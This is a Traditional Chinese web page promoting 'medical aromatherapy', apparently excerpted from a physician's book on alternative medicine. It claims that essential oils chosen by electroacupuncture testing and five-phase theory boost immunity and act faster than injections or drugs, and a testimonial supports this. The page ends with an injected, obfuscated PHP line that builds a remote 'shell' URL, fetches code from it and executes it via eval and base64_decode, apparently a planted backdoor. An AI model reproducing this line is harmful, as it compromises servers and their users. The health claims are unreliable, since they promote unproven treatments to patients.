收藏本站
首頁 arrow 另類醫學簡介 arrow 醫學芳療 (Medical Aroma Therapy)
醫學芳療 (Medical Aroma Therapy) 列印 E-mail
《醫學芳療Aroma Therapy》
精油是萃取自植物的花、葉、種子、根莖或樹皮的揮發性有香物質,能及時而有效的進入身體,穩定情緒,幫助血液循環,促進新陳代謝,達到強化免疫功能的效果。

精油原來這麼好!
我跟許多人一樣,雖然知道精油在西方歷史文化中有其深遠豐富的淵源,且在歐、美、澳等地早已發展出一套身、心、靈療癒的精密科學模式,卻從不曾領略過它的功效。在偶然的機會下,友人周雪梅送給我兩瓶精油,經過傅爾電針測試,一者為香茅精油,大部分的人都不適合,另一瓶為薄荷精油,大多數的人都適合。我在臨床上用來幫助肩頸酸痛的患者緩解疼痛,才發現精油原來也可以是這麼好的東西!遂開始對芳香療法產生莫大的興趣。

調配適合國人的精油
精油是萃取自植物的花、葉、種子、根莖或樹皮的揮發性有香物質,萃取的方式分為蒸餾、溶液萃取、壓搾、浸泡等,端視植物的種類與特性而定。目前經常被使用的精油約有三百多種,每一種都具有已被現代研究肯定的某種特性、效益與藥用功效,能及時而有效的進入身體,達到情緒、心智、精神的寧靜平穩與和諧;幫助血液循環,將氧氣和養分帶進細胞組織,同時有效排除因細胞新陳代謝所產生的二氧化碳和廢物,使身體血液活絡,達到強化免疫功能的效果。

逐一開發複方精油
首先,我大量蒐集世界各地各種質純的精油,先用傅爾電針測試,篩選出適合東方人體質的精油,再以中醫的五行(木、火、土、金、水)及經絡學說為底,將精油歸經(針對五臟六腑的屬性將精油歸類),並以中醫五行生剋理論,將精油調和成適當比例的複方精油。從物理學的角度來看,人體是一坨坨電子雲組成的磁場,只要精油影響到人體的某一個器官,無論從物理學、器官磁場的相互影響,或從五行生剋的系統觀點來看,任一器官勢必會再影響到其他的器官。

BOX 認識好精油
①為了確保精油的功效,一定要選用純精油。不論精油聞起來多香,人工合成精油或以化學
物質仿製而成的精油,或者是只為了增加份量而添加酒精的精油,不但對人體不具任何療
效,反而有害。
②當兩種以上精油調和的效果優於單方的效果時,我們稱之為「協同作用」。因此取兩種或
更多純精油所調和而成的「複方精油」,將比各自使用單方精油帶來更大的效益。
③坊間許多自稱「五行精油」者,經本人測試,多為商業包裝與行銷,所述功效與臨床測試
實際落差甚大,本人無法為之背書。

醫學芳療的定位
經過多年觀察,我發現坊間許多號稱芳療中心所實施的芳香療法,只能稱之為油壓(Oil Massage)。油壓可能有其效果,因為即使不用任何精油而純粹按摩,對某些患者也具有舒緩的感覺,但是坊間不易精準地擷取到芳療真正在醫學臨床治療上的重點(The Key Point of the Medical Aroma Therapy)。我們以中醫五行與經脈理論,加上西醫科學理論,調配出許多可改善疾病症狀與治療疾病的精油,經過數年臨床經驗證實其療效,才有資格稱為醫學芳香療法(Medical Aroma Therapy)。

按抹泡蒸吸都有好處
臨床上使用精油的方式,分為外用與內服兩種,都可以達到完美的芳療成效。外用部分,係以經脈按摩及穴道指壓為主,讓精油透過皮膚的呼吸作用進入經脈與穴道,輔以泡澡或不超過攝氏七十度低溫的蒸氣,讓皮膚的毛細孔自然呼吸精油;或以超音波冷噴薰香機,透過呼吸道吸入精油的薰香方式,來達到療效。內服部份則較不建議,若欲內服,須由專業人士精準地選出適合的精油種類與劑量。

臨床效果一加一大於

近二十年來,我在臨床治療上經常發現「一加一大於二」,因為我不只以中學為體、西學為用,更把主流醫學與另類醫學大結合,讓患者有更多的醫療選擇權;並因為能夠整合多元醫療方法,而能創造人類真正的健康與福祉。將芳香療法融合中醫與西醫等相關理論使用在臨床上,效果甚至比打針、吃藥還快速,常令患者驚奇的說不出話來!

芳療臨床實例
-我吐出一口陳年老痰

我有一口痰卡在胸腹間好幾個月,吞不下去也吐不出來,看遍中西群醫也束手無策。後來經朋友介紹來看劉醫師,奇怪的是他只拿精油在我手上來回塗抹幾次,我的呼吸便立刻順暢許多;接著劉醫師拿刮痧板在我手上刮了幾下,卡了幾個月的痰竟可以吐出來了,頓時有種胸中鬱悶之氣一吐為快的清新舒適之感。四十五歲/陳先生

芳療協同治療效果好
芳香療法是另類醫學中非常重要的一環,在台灣也行之有年,卻因相關單位尚未有芳療的法令規章予以規範,因此市面上精油的成份、品質……等,很難辨其優劣,人員訓練品質也參差不齊,甚至全盤接收來自國外的芳療學說,其做法恐值得商議。我甚至看過一本書,文中還特別強調精油不該與中醫的經脈結合使用,更反對中學為體、西學為用,我看了深以為憾!因為主張這個錯誤概念的譯者不是醫師,完全無法體會芳香療法在人體運用的道理。他們不知道,只要是運用在人體的物質,無論是吃的、吸入的、塗抹的、注射的…,都會被人體吸收,也都會影響到人體的細胞、組織與器官…等。對於完全不懂中醫五行理論、也不懂西醫病理藥理理論,又任意批評者,我也只能搖頭嘆息。只要是從事專業醫療行為的人,都不應相互攻擊批評,應以謙虛的態度去尊重對方才是,畢竟每個學問都有它可貴的價值,差別只在於操作者有沒有辦法正確運用而已。才可內服。

 

所有另類醫學文字內容及案例介紹均為重點摘要
詳文,請至各大書局或網路書局購買(書泉出版社)九八年五月印行
劉大元醫師所著【不一樣的另類醫學】
 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));